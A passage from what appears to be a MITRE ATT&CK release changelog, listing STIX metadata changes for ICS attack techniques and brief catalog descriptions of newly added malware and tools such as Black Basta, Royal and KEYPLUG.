be used as a trial for initialization. (Citation: Omron)
kill_chain_phases[0]['phase_name'] | collection-ics | collection
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[T0817] Drive-by Compromise

Current version: 1.0

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-20 18:27:54.818000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | initial-access-ics | initial-access
iterable_item_added
STIX Field | Old value | New value
x_mitre_data_sources | File: File Creation
x_mitre_data_sources | Network Traffic: Network Traffic Content
iterable_item_removed
STIX Field | Old value | New value
x_mitre_data_sources | Network Traffic: Network Traffic Content
x_mitre_data_sources | File: File Creation

[T0871] Execution through API

Current version: 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-27 15:32:03.427000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | execution-ics | execution

[T0819] Exploit Public-Facing Application

Current version: 1.0

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-19 14:21:18.045000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | initial-access-ics | initial-access

[T0820] Exploitation for Evasion

Current version: 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-30 15:28:37.716000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | evasion-ics | evasion
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[T0866] Exploitation of Remote Services

Current version: 1.0

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-20 19:23:07.842000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | initial-access-ics | initial-access
kill_chain_phases[1]['phase_name'] | lateral-movement-ics | lateral-movement
x_mitre_data_sources[0] | Network Traffic: Network Traffic Content | Application Log: Application Log Content
x_mitre_data_sources[1] | Application Log: Application Log Content | Network Traffic: Network Traffic Content

[T0823] Graphical User Interface

Current version: 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-30 15:02:29.881000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | execution-ics | execution
iterable_item_added
STIX Field | Old value | New value
x_mitre_data_sources | Process: Process Creation
iterable_item_removed
STIX Field | Old value | New value
x_mitre_data_sources | Process: Process Creation

[T0891] Hardcoded Credentials

Current version: 1.0

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-29 20:54:56.812000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | lateral-movement-ics | lateral-movement
kill_chain_phases[1]['phase_name'] | persistence-ics | persistence
x_mitre_data_sources[0] | Network Traffic: Network Traffic Content | Logon Session: Logon Session Creation
x_mitre_data_sources[1] | Logon Session: Logon Session Creation | Network Traffic: Network Traffic Content

[T0877] I/O Image

Current version: 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-27 18:41:43.724000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | collection-ics | collection
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[T0872] Indicator Removal on Host

Current version: 1.0

Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | evasion-ics | evasion
x_mitre_data_sources[0] | File: File Metadata | File: File Modification
x_mitre_data_sources[1] | Process: Process Creation | Windows Registry: Windows Registry Key Deletion
x_mitre_data_sources[2] | File: File Modification | File: File Metadata
x_mitre_data_sources[3] | Windows Registry: Windows Registry Key Modification | Process: OS API Execution
x_mitre_data_sources[5] | Command: Command Execution | Process: Process Creation
x_mitre_data_sources[6] | Windows Registry: Windows Registry Key Deletion | Command: Command Execution
x_mitre_data_sources[7] | Process: OS API Execution | Windows Registry: Windows Registry Key Modification

[T0883] Internet Accessible Device

Current version: 1.0

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-19 14:34:43.060000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | initial-access-ics | initial-access
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[T0867] Lateral Tool Transfer

Current version: 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-27 17:39:15.755000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | lateral-movement-ics | lateral-movement
x_mitre_data_sources[0] | Network Traffic: Network Traffic Content | File: File Metadata
x_mitre_data_sources[1] | Network Share: Network Share Access | Network Traffic: Network Traffic Flow
x_mitre_data_sources[2] | Network Traffic: Network Traffic Flow | File: File Creation
x_mitre_data_sources[3] | Command: Command Execution | Network Traffic: Network Traffic Content
x_mitre_data_sources[4] | File: File Creation | Process: Process Creation
x_mitre_data_sources[5] | File: File Metadata | Command: Command Execution
x_mitre_data_sources[6] | Process: Process Creation | Network Share: Network Share Access

[T0826] Loss of Availability

Current version: 1.0

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-19 14:36:34.715000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | impact-ics | impact

[T0827] Loss of Control

Current version: 1.0

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-19 14:38:06.130000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | impact-ics | impact

[T0828] Loss of Productivity and Revenue

Current version: 1.0

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-20 19:31:11.106000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | impact-ics | impact

[T0837] Loss of Protection

Current version: 1.0

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-19 14:40:19.570000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | impact-ics | impact

[T0880] Loss of Safety

Current version: 1.0

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-19 14:41:41.466000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | impact-ics | impact

[T0829] Loss of View

Current version: 1.0

Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | impact-ics | impact

[T0831] Manipulation of Control

Current version: 1.0

Details
values_changed
STIX Field | Old value | New value
modified | 2022-05-24 14:57:44.326000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | impact-ics | impact

[T0832] Manipulation of View

Current version: 1.0

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-20 19:30:22.792000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | impact-ics | impact

[T0849] Masquerading

Current version: 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-27 16:56:31.022000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | evasion-ics | evasion
x_mitre_data_sources[1] | Command: Command Execution | Scheduled Job: Scheduled Job Modification
x_mitre_data_sources[2] | Service: Service Modification | File: File Metadata
x_mitre_data_sources[3] | Service: Service Creation | Process: Process Metadata
x_mitre_data_sources[4] | File: File Modification | Service: Service Modification
x_mitre_data_sources[5] | Process: Process Metadata | File: File Modification
x_mitre_data_sources[6] | File: File Metadata | Command: Command Execution
x_mitre_data_sources[7] | Scheduled Job: Scheduled Job Modification | Service: Service Creation

[T0821] Modify Controller Tasking

Current version: 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-27 15:49:27.003000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | execution-ics | execution
x_mitre_data_sources[1] | Operational Databases: Device Alarm | Application Log: Application Log Content
x_mitre_data_sources[2] | Application Log: Application Log Content | Operational Databases: Device Alarm

[T0889] Modify Program

Current version: 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-27 16:08:15.574000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | persistence-ics | persistence
x_mitre_data_sources[2] | Asset: Software | Operational Databases: Device Alarm
x_mitre_data_sources[3] | Operational Databases: Device Alarm | Asset: Software

[T0839] Module Firmware

Current version: 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-26 18:41:49.037000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | persistence-ics | persistence
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[2] | Application Log: Application Log Content | Firmware: Firmware Modification
iterable_item_added
STIX Field | Old value | New value
x_mitre_data_sources | Application Log: Application Log Content
iterable_item_removed
STIX Field | Old value | New value
x_mitre_data_sources | Firmware: Firmware Modification

[T0801] Monitor Process State

Current version: 1.0

Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | collection-ics | collection
x_mitre_data_sources[0] | Application Log: Application Log Content | Network Traffic: Network Traffic Content
x_mitre_data_sources[1] | Network Traffic: Network Traffic Content | Application Log: Application Log Content

[T0834] Native API

Current version: 1.0

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-19 14:52:28.584000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | execution-ics | execution

[T0840] Network Connection Enumeration

Current version: 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-27 17:22:27.357000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | discovery-ics | discovery
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[1] | Script: Script Execution | Command: Command Execution
x_mitre_data_sources[3] | Command: Command Execution | Script: Script Execution

[T0842] Network Sniffing

Current version: 1.0

Details
values_changed
STIX Field: Old value → New value
modified: 2022-09-20 19:22:11.937000+00:00 → 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']: discovery-ics → discovery
x_mitre_data_sources[0]: Command: Command Execution → Process: Process Creation
x_mitre_data_sources[1]: Process: Process Creation → Command: Command Execution

[T0861] Point & Tag Identification

Current version: 1.1

Details
values_changed
STIX Field: Old value → New value
modified: 2022-09-26 15:24:07.480000+00:00 → 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']: collection-ics → collection
x_mitre_data_sources[0]: Network Traffic: Network Traffic Content → Application Log: Application Log Content
x_mitre_data_sources[1]: Application Log: Application Log Content → Network Traffic: Network Traffic Content

[T0843] Program Download

Current version: 1.1

Details
values_changed
STIX Field: Old value → New value
modified: 2022-09-26 16:25:38.670000+00:00 → 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']: lateral-movement-ics → lateral-movement
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_data_sources[1]: Operational Databases: Device Alarm → Asset: Asset Inventory
x_mitre_data_sources[3]: Asset: Asset Inventory → Operational Databases: Device Alarm

[T0845] Program Upload

Current version: 1.0

Details
values_changed
STIX Field: Old value → New value
modified: 2022-10-24 15:09:07.609000+00:00 → 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']: collection-ics → collection
x_mitre_data_sources[1]: Network Traffic: Network Traffic Flow → Network Traffic: Network Traffic Content
x_mitre_data_sources[2]: Network Traffic: Network Traffic Content → Network Traffic: Network Traffic Flow

[T0873] Project File Infection

Current version: 1.0

Details
values_changed
STIX Field: Old value → New value
modified: 2022-09-20 18:37:59.276000+00:00 → 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']: persistence-ics → persistence

[T0886] Remote Services

Current version: 1.1

Details
values_changed
STIX Field: Old value → New value
modified: 2022-09-30 15:01:43.553000+00:00 → 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']: initial-access-ics → initial-access
kill_chain_phases[1]['phase_name']: lateral-movement-ics → lateral-movement
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_data_sources[0]: Process: Process Creation → Module: Module Load
x_mitre_data_sources[1]: Network Traffic: Network Connection Creation → Process: Process Creation
x_mitre_data_sources[2]: Module: Module Load → Network Share: Network Share Access
x_mitre_data_sources[3]: Network Share: Network Share Access → Network Traffic: Network Traffic Flow
x_mitre_data_sources[6]: Network Traffic: Network Traffic Flow → Network Traffic: Network Connection Creation

[T0846] Remote System Discovery

Current version: 1.1

Details
values_changed
STIX Field: Old value → New value
modified: 2022-09-30 15:34:29.457000+00:00 → 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']: discovery-ics → discovery
x_mitre_data_sources[0]: Network Traffic: Network Traffic Content → Network Traffic: Network Traffic Flow
x_mitre_data_sources[1]: File: File Access → Network Traffic: Network Traffic Content
x_mitre_data_sources[3]: Network Traffic: Network Traffic Flow → File: File Access

[T0888] Remote System Information Discovery

Current version: 1.1


Old Description
An adversary may attempt to get detailed information about remote systems and their peripherals, such as make/model, role, and configuration. Adversaries may use information from Remote System Information Discovery to aid in targeting and shaping follow-on behaviors. For example, the systems operational role and model information can dictate whether it is a relevant target for the adversary's operational objectives. In addition, the systems configuration may be used to scope subsequent technique usage. Requests for system information are typically implemented using automation and management protocols and are often automatically requested by vendor software during normal operation. This information may be used to tailor management actions, such as program download and system or module firmware. An adversary may leverage this same information by issuing calls directly to the systems API.

New Description
An adversary may attempt to get detailed information about remote systems and their peripherals, such as make/model, role, and configuration. Adversaries may use information from Remote System Information Discovery to aid in targeting and shaping follow-on behaviors. For example, the system's operational role and model information can dictate whether it is a relevant target for the adversary's operational objectives. In addition, the system's configuration may be used to scope subsequent technique usage. Requests for system information are typically implemented using automation and management protocols and are often automatically requested by vendor software during normal operation. This information may be used to tailor management actions, such as program download and system or module firmware. An adversary may leverage this same information by issuing calls directly to the system's API.

Details
values_changed
STIX Field: Old value → New value
modified: 2022-09-26 14:40:01.435000+00:00 → 2023-03-17 15:14:31.276000+00:00
description: An adversary may attempt to get detailed information about remote systems and their peripherals, such as make/model, role, and configuration. Adversaries may use information from Remote System Information Discovery to aid in targeting and shaping follow-on behaviors. For example, the systems operational role and model information can dictate whether it is a relevant target for the adversary's operational objectives. In addition, the systems configuration may be used to scope subsequent technique usage. Requests for system information are typically implemented using automation and management protocols and are often automatically requested by vendor software during normal operation. This information may be used to tailor management actions, such as program download and system or module firmware. An adversary may leverage this same information by issuing calls directly to the systems API. → An adversary may attempt to get detailed information about remote systems and their peripherals, such as make/model, role, and configuration. Adversaries may use information from Remote System Information Discovery to aid in targeting and shaping follow-on behaviors. For example, the system's operational role and model information can dictate whether it is a relevant target for the adversary's operational objectives. In addition, the system's configuration may be used to scope subsequent technique usage. Requests for system information are typically implemented using automation and management protocols and are often automatically requested by vendor software during normal operation. This information may be used to tailor management actions, such as program download and system or module firmware. An adversary may leverage this same information by issuing calls directly to the system's API.
kill_chain_phases[0]['phase_name']: discovery-ics → discovery
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_data_sources[0]: Network Traffic: Network Traffic Content → File: File Access
x_mitre_data_sources[3]: File: File Access → Network Traffic: Network Traffic Content

[T0847] Replication Through Removable Media

Current version: 1.0

Details
values_changed
STIX Field: Old value → New value
modified: 2022-09-20 19:18:25.490000+00:00 → 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']: initial-access-ics → initial-access
iterable_item_added
STIX Field: New value
x_mitre_data_sources: Process: Process Creation
iterable_item_removed
STIX Field: Old value
x_mitre_data_sources: Process: Process Creation

[T0851] Rootkit

Current version: 1.1

Details
values_changed
STIX Field: Old value → New value
modified: 2022-10-20 20:44:34.980000+00:00 → 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']: evasion-ics → evasion
x_mitre_attack_spec_version: 2.1.0 → 3.1.0

[T0852] Screen Capture

Current version: 1.0

Details
values_changed
STIX Field: Old value → New value
modified: 2022-10-24 15:09:07.609000+00:00 → 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']: collection-ics → collection

[T0853] Scripting

Current version: 1.0

Details
values_changed
STIX Field: Old value → New value
modified: 2022-09-20 18:18:34.807000+00:00 → 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']: execution-ics → execution
iterable_item_added
STIX Field: New value
x_mitre_data_sources: Script: Script Execution
x_mitre_data_sources: Process: Process Creation
iterable_item_removed
STIX Field: Old value
x_mitre_data_sources: Process: Process Creation
x_mitre_data_sources: Script: Script Execution

[T0865] Spearphishing Attachment

Current version: 1.1

Details
values_changed
STIX Field: Old value → New value
modified: 2022-09-27 15:22:37.964000+00:00 → 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']: initial-access-ics → initial-access
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
iterable_item_added
STIX Field: New value
x_mitre_data_sources: Network Traffic: Network Traffic Content
iterable_item_removed
STIX Field: Old value
x_mitre_data_sources: Network Traffic: Network Traffic Content

[T0869] Standard Application Layer Protocol

Current version: 1.0

Details
values_changed
STIX Field: Old value → New value
modified: 2022-10-24 15:09:07.609000+00:00 → 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']: command-and-control-ics → command-and-control
x_mitre_data_sources[0]: Network Traffic: Network Traffic Content → Network Traffic: Network Traffic Flow
x_mitre_data_sources[1]: Network Traffic: Network Traffic Flow → Network Traffic: Network Traffic Content

[T0862] Supply Chain Compromise

Current version: 1.1

Details
values_changed
STIX Field: Old value → New value
modified: 2022-09-27 15:25:50.699000+00:00 → 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']: initial-access-ics → initial-access

[T0857] System Firmware

Current version: 1.1

Details
values_changed
STIX Field: Old value → New value
modified: 2022-09-26 17:14:52.590000+00:00 → 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']: persistence-ics → persistence
x_mitre_data_sources[0]: Network Traffic: Network Traffic Content → Application Log: Application Log Content
x_mitre_data_sources[1]: Firmware: Firmware Modification → Operational Databases: Device Alarm
x_mitre_data_sources[2]: Application Log: Application Log Content → Network Traffic: Network Traffic Content
x_mitre_data_sources[3]: Operational Databases: Device Alarm → Firmware: Firmware Modification

[T0882] Theft of Operational Information

Current version: 1.0

Details
values_changed
STIX Field: Old value → New value
modified: 2022-10-24 15:09:07.609000+00:00 → 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']: impact-ics → impact

[T0863] User Execution

Current version: 1.1

Details
values_changed
STIX Field: Old value → New value
modified: 2022-09-27 16:03:41.333000+00:00 → 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']: execution-ics → execution
x_mitre_data_sources[0]: Network Traffic: Network Traffic Content → Application Log: Application Log Content
x_mitre_data_sources[1]: Command: Command Execution → File: File Access
x_mitre_data_sources[2]: Application Log: Application Log Content → Process: Process Creation
x_mitre_data_sources[4]: Process: Process Creation → Command: Command Execution
x_mitre_data_sources[5]: File: File Access → Network Traffic: Network Traffic Content

[T0859] Valid Accounts

Current version: 1.1

Details
values_changed
STIX Field: Old value → New value
modified: 2022-09-27 16:35:12.478000+00:00 → 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']: persistence-ics → persistence
kill_chain_phases[1]['phase_name']: lateral-movement-ics → lateral-movement
iterable_item_added
STIX Field: New value
x_mitre_data_sources: Logon Session: Logon Session Metadata
iterable_item_removed
STIX Field: Old value
x_mitre_data_sources: Logon Session: Logon Session Metadata

[T0887] Wireless Sniffing

Current version: 1.1

Details
values_changed
STIX Field: Old value → New value
modified: 2022-09-27 17:37:02.773000+00:00 → 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']: discovery-ics → discovery
kill_chain_phases[1]['phase_name']: collection-ics → collection

Software

enterprise-attack

New Software

[S1053] AvosLocker

Current version: 1.0

Description: [AvosLocker](https://attack.mitre.org/software/S1053) is ransomware written in C++ that has been offered via the Ransomware-as-a-Service (RaaS) model. It was first observed in June 2021 and has been used against financial services, critical manufacturing, government facilities, and other critical infrastructure sectors in the United States. As of March 2022, [AvosLocker](https://attack.mitre.org/software/S1053) had also been used against organizations in Belgium, Canada, China, Germany, Saudi Arabia, Spain, Syria, Taiwan, Turkey, the United Arab Emirates, and the United Kingdom.(Citation: Malwarebytes AvosLocker Jul 2021)(Citation: Trend Micro AvosLocker Apr 2022)(Citation: Joint CSA AvosLocker Mar 2022)


[S1070] Black Basta

Current version: 1.0

Description: [Black Basta](https://attack.mitre.org/software/S1070) is ransomware written in C++ that has been offered within the ransomware-as-a-service (RaaS) model since at least April 2022; there are variants that target Windows and VMWare ESXi servers. [Black Basta](https://attack.mitre.org/software/S1070) operations have included the double extortion technique where in addition to demanding ransom for decrypting the files of targeted organizations the cyber actors also threaten to post sensitive information to a leak site if the ransom is not paid. [Black Basta](https://attack.mitre.org/software/S1070) affiliates have targeted multiple high-value organizations, with the largest number of victims based in the U.S. Based on similarities in TTPs, leak sites, payment sites, and negotiation tactics, security researchers assess the [Black Basta](https://attack.mitre.org/software/S1070) RaaS operators could include current or former members of the [Conti](https://attack.mitre.org/software/S0575) group.(Citation: Palo Alto Networks Black Basta August 2022)(Citation: Deep Instinct Black Basta August 2022)(Citation: Minerva Labs Black Basta May 2022)(Citation: Avertium Black Basta June 2022)(Citation: NCC Group Black Basta June 2022)(Citation: Cyble Black Basta May 2022)


[S1068] BlackCat

Current version: 1.0

Description: [BlackCat](https://attack.mitre.org/software/S1068) is ransomware written in Rust that has been offered via the Ransomware-as-a-Service (RaaS) model. First observed November 2021, [BlackCat](https://attack.mitre.org/software/S1068) has been used to target multiple sectors and organizations in various countries and regions in Africa, the Americas, Asia, Australia, and Europe.(Citation: Microsoft BlackCat Jun 2022)(Citation: Sophos BlackCat Jul 2022)(Citation: ACSC BlackCat Apr 2022)


[S1063] Brute Ratel C4

Current version: 1.0

Description: [Brute Ratel C4](https://attack.mitre.org/software/S1063) is a commercial red-teaming and adversarial attack simulation tool that first appeared in December 2020. [Brute Ratel C4](https://attack.mitre.org/software/S1063) was specifically designed to avoid detection by endpoint detection and response (EDR) and antivirus (AV) capabilities, and deploys agents called badgers to enable arbitrary command execution for lateral movement, privilege escalation, and persistence. In September 2022, a cracked version of [Brute Ratel C4](https://attack.mitre.org/software/S1063) was leaked in the cybercriminal underground, leading to its use by threat actors.(Citation: Dark Vortex Brute Ratel C4)(Citation: Palo Alto Brute Ratel July 2022)(Citation: MDSec Brute Ratel August 2022)(Citation: SANS Brute Ratel October 2022)(Citation: Trend Micro Black Basta October 2022)


[S1052] DEADEYE

Current version: 1.0

Description: [DEADEYE](https://attack.mitre.org/software/S1052) is a malware launcher that has been used by [APT41](https://attack.mitre.org/groups/G0096) since at least May 2021. [DEADEYE](https://attack.mitre.org/software/S1052) has variants that can either embed a payload inside a compiled binary (DEADEYE.EMBED) or append it to the end of a file (DEADEYE.APPEND).(Citation: Mandiant APT41)


[S1066] DarkTortilla

Current version: 1.0

Description: [DarkTortilla](https://attack.mitre.org/software/S1066) is a highly configurable .NET-based crypter that has been possibly active since at least August 2015. [DarkTortilla](https://attack.mitre.org/software/S1066) has been used to deliver popular information stealers, RATs, and payloads such as [Agent Tesla](https://attack.mitre.org/software/S0331), AsyncRat, [NanoCore](https://attack.mitre.org/software/S0336), RedLine, [Cobalt Strike](https://attack.mitre.org/software/S0154), and Metasploit.(Citation: Secureworks DarkTortilla Aug 2022)


[S1072] Industroyer2

Current version: 1.0

Description: [Industroyer2](https://attack.mitre.org/software/S1072) is a compiled and static piece of malware that has the ability to communicate over the IEC-104 protocol. It is similar to the IEC-104 module found in [Industroyer](https://attack.mitre.org/software/S0604). Security researchers assess that [Industroyer2](https://attack.mitre.org/software/S1072) was designed to cause impact to high-voltage electrical substations. The initial [Industroyer2](https://attack.mitre.org/software/S1072) sample was compiled on 03/23/2022 and scheduled to execute on 04/08/2022, however it was discovered before deploying, resulting in no impact.(Citation: Industroyer2 Blackhat ESET)


[S1051] KEYPLUG

Current version: 1.0

Description: [KEYPLUG](https://attack.mitre.org/software/S1051) is a modular backdoor written in C++, with Windows and Linux variants, that has been used by [APT41](https://attack.mitre.org/groups/G0096) since at least June 2021.(Citation: Mandiant APT41)


[S1060] Mafalda

Current version: 1.0

Description: [Mafalda](https://attack.mitre.org/software/S1060) is a flexible interactive implant that has been used by [Metador](https://attack.mitre.org/groups/G1013). Security researchers assess the [Mafalda](https://attack.mitre.org/software/S1060) name may be inspired by an Argentinian cartoon character that has been popular as a means of political commentary since the 1960s. (Citation: SentinelLabs Metador Sept 2022)


[S1058] Prestige

Current version: 1.0

Description: [Prestige](https://attack.mitre.org/software/S1058) ransomware has been used by [Sandworm Team](https://attack.mitre.org/groups/G0034) since at least March 2022, including against transportation and related logistics industries in Ukraine and Poland in October 2022.(Citation: Microsoft Prestige ransomware October 2022)


[S1073] Royal

Current version: 1.0

Description: [Royal](https://attack.mitre.org/software/S1073) is ransomware that first appeared in early 2022; a version that also targets ESXi servers was later observed in February 2023. [Royal](https://attack.mitre.org/software/S1073) employs partial encryption and multiple threads to evade detection and speed encryption. [Royal](https://attack.mitre.org/software/S1073) has been used in attacks against multiple industries worldwide--including critical infrastructure. Security researchers have identified similarities in the encryption routines and TTPs used in [Royal](https://attack.mitre.org/software/S1073) and [Conti](https://attack.mitre.org/software/S0575) attacks and noted a possible connection between their operators.(Citation: Microsoft Royal ransomware November 2022)(Citation: Cybereason Royal December 2022)(Citation: Kroll Royal Deep Dive February 2023)(Citation: Trend Micro Royal Linux ESXi February 2023)(Citation: CISA Royal AA23-061A March 2023)


[S1071] Rubeus

Current version: 1.0

Description: [Rubeus](https://attack.mitre.org/software/S1071) is a C# toolset designed for raw Kerberos interaction that has been used since at least 2020, including in ransomware operations.(Citation: GitHub Rubeus March 2023)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)


[S1064] SVCReady

Current version: 1.0

Description: [SVCReady](https://attack.mitre.org/software/S1064) is a loader that has been used since at least April 2022 in malicious spam campaigns. Security researchers have noted overlaps between [TA551](https://attack.mitre.org/groups/G0127) activity and [SVCReady](https://attack.mitre.org/software/S1064) distribution, including similarities in file names, lure images, and identical grammatical errors.(Citation: HP SVCReady Jun 2022)


[S1065] Woody RAT

Current version: 1.0

Description: [Woody RAT](https://attack.mitre.org/software/S1065) is a remote access trojan (RAT) that has been used since at least August 2021 against Russian organizations.(Citation: MalwareBytes WoodyRAT Aug 2022)


[S1059] metaMain

Current version: 1.0

Description: [metaMain](https://attack.mitre.org/software/S1059) is a backdoor used by [Metador](https://attack.mitre.org/groups/G1013) to maintain long-term access to compromised machines; it has also been used to decrypt [Mafalda](https://attack.mitre.org/software/S1060) into memory.(Citation: SentinelLabs Metador Sept 2022)(Citation: SentinelLabs Metador Technical Appendix Sept 2022)

Minor Version Changes

[S0677] AADInternals

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field: Old value → New value
modified: 2022-08-03 15:01:46.965000+00:00 → 2023-04-15 00:59:18.335000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.1 → 1.2

[S0552] AdFind

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field: Old value → New value
modified: 2022-09-29 20:40:24.739000+00:00 → 2023-03-02 20:44:17.690000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.1 → 1.2

[S0373] Astaroth

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
dictionary_item_added
STIX Field: New value
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New value
modified: 2020-12-08 21:14:48.861000+00:00 → 2023-03-21 21:20:23.717000+00:00
external_references[2]['source_name']: Cybereason Astaroth Feb 2019 → Cofense Astaroth Sept 2018
external_references[2]['description']: Salem, E. (2019, February 13). ASTAROTH MALWARE USES LEGITIMATE OS AND ANTIVIRUS PROCESSES TO STEAL PASSWORDS AND PERSONAL DATA. Retrieved April 17, 2019. → Doaty, J., Garrett, P.. (2018, September 10). We’re Seeing a Resurgence of the Demonic Astaroth WMIC Trojan. Retrieved April 17, 2019.
external_references[2]['url']: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research → https://cofense.com/seeing-resurgence-demonic-astaroth-wmic-trojan/
external_references[3]['source_name']: Cofense Astaroth Sept 2018 → Securelist Brazilian Banking Malware July 2020
external_references[3]['description']: Doaty, J., Garrett, P.. (2018, September 10). We’re Seeing a Resurgence of the Demonic Astaroth WMIC Trojan. Retrieved April 17, 2019. → GReAT. (2020, July 14). The Tetrade: Brazilian banking malware goes global. Retrieved November 9, 2020.
external_references[3]['url']: https://cofense.com/seeing-resurgence-demonic-astaroth-wmic-trojan/ → https://securelist.com/the-tetrade-brazilian-banking-malware/97779/
external_references[4]['source_name']: Securelist Brazilian Banking Malware July 2020 → Cybereason Astaroth Feb 2019
external_references[4]['description']: GReAT. (2020, July 14). The Tetrade: Brazilian banking malware goes global. Retrieved November 9, 2020. → Salem, E. (2019, February 13). ASTAROTH MALWARE USES LEGITIMATE OS AND ANTIVIRUS PROCESSES TO STEAL PASSWORDS AND PERSONAL DATA. Retrieved April 17, 2019.
external_references[4]['url']: https://securelist.com/the-tetrade-brazilian-banking-malware/97779/ → https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 2.0 → 2.1

[S0475] BackConfig

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
